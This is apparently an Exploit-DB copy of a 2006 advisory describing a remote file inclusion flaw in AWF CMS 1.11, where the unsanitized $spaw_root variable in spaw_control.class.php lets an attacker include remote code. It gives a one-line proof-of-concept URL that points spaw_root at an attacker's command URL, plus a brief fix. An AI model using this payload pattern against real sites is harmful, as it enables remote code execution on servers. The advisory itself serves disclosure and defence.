Advisory id: FSA:011

vendor:

AWF CMS

by:

Federico Fazzi

7,5

CVSS

HIGH

Remote command execution

N/A

CWE

Product Name: AWF CMS

Affected Version From: AWF CMS 1.11

Affected Version To: AWF CMS 1.11

Patch Exists: unavailable

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Error occured in spaw_control.class.php, include $spaw_root.'config/spaw_control.config.php'; include $spaw_root.'class/toolbars.class.php'; include $spaw_root.'class/lang.class.php'; variable $spaw_root not sanitized.

Mitigation:

declare $spaw_root.

Source

Exploit-DB raw data:

-----------------------------------------------------
Advisory id: FSA:011

Author:    Federico Fazzi
Date:      11/06/2006, 22:30
Sinthesis: AWF CMS 1.11, Remote command execution
Type:      high
Product:   http://www.awf-cms.org/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in spaw_control.class.php,

include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';

variable $spaw_root not sanitized.

2) Proof of concept:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/
(note: add a cmd url with final slash (/))

3) Solution:

declare $spaw_root.

# milw0rm.com [2006-06-11]